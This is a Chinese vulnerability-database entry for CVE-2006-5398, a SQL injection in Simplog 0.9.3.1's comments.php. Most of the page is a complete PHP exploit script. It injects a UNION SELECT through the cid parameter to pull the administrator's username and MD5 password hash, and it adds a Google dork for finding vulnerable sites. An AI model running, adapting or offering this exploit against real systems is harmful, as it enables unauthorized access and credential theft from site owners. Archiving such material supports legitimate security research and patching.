Simplog 'Comments.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111305 漏洞类型 SQL注入
发布时间 2006-10-16 更新时间 2006-10-19
CVE编号 CVE-2006-5398 CNNVD-ID CNNVD-200610-305
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2574
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-305
|漏洞详情
Simplog0.9.3.1的comments.php中存在SQL注入漏洞,远程攻击者可通过cid参数执行任意SQL命令。
|漏洞EXP
#!/usr/bin/php
<?php
 /*********************************************************************
 * Simplog 0.9.3.1 Remote SQL Injection Vulnerability 
 * 
 * Note:
 * Requires at least one blog entry to be made prior to injection
 *
 * Usage: 
 * php script.php [host] [path] [user id]
 *
 * Usage Example:
 * php script.php domain.com /simplog/ 1
 *
 * Googledork:
 * intext:Powered by Simplog
 *
 * Credits:
 * Disfigure - Vulnerability research and discovery
 * Synsta - Exploit scripting
 * 
 * [w4ck1ng] - w4ck1ng.com
 *********************************************************************/

if(!$argv[3 ]){
die("Usage:
php $argv[0] [host] [path] [user id]\n
Usage Example:
php $argv[0] domain.com /simplog/ 1\n");
}

if($argv[3]){

function send($host, $put){
global $data;
$conn = fsockopen( gethostbyname($host),"80" );
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn, $put);
}
while(!feof($conn)) {
$data .=fgets( $conn);
}
fclose($conn);
return $data;
}

$host = $argv[ 1];
$path = $argv[ 2];
$userid = $argv[ 3];

$sql = urlencode( "-1 union select 9,9,9,login,9,password,9,9 from blog_users where admin=$userid");
$req =  "GET ". $path."comments.php?op=edit&cid=". "$sql HTTP/1.1\r\n";
$req .= "Host: $host\r\n";
//$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Type: text/plain\r\n" ;
$req .= "Connection: Close\r\n\r\n" ;
send("$host", "$req");

$aname = explode( "><input type=text name=cname maxlength=64 value=\"",$data);
$bname = explode( "\">",$aname[1 ]);
$name = $bname[ 0];
$ahash = explode( "<textarea name=comment rows=10 cols=40 wrap=physical>",$data);
$bhash = explode( "</textarea>",$ahash[1 ]);
$hash = $bhash[ 0];

if(strlen($hash) !=  32){ 
die("Exploit failed..\n"); 
}else{ 
die("Username: $name MD5: $hash\n"); 
}
}
?>

# milw0rm.com [2006-10-16]
|参考资料

来源:XF
名称:simplog-comments-sql-injection(29590)
链接:http://xforce.iss.net/xforce/xfdb/29590
来源:BID
名称:20556
链接:http://www.securityfocus.com/bid/20556
来源:MILW0RM
名称:2574
链接:http://www.milw0rm.com/exploits/2574
来源:www.simplog.org
链接:http://www.simplog.org/archive.php?blogid=1&pid=57
来源:BUGTRAQ
名称:20061018Simplog0.9.3.1SQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/449092/100/0/threaded
来源:SECTRACK
名称:1017087
链接:http://securitytracker.com/id?1017087
来源:MILW0RM
名称:2574
链接:http://milw0rm.com/exploits/2574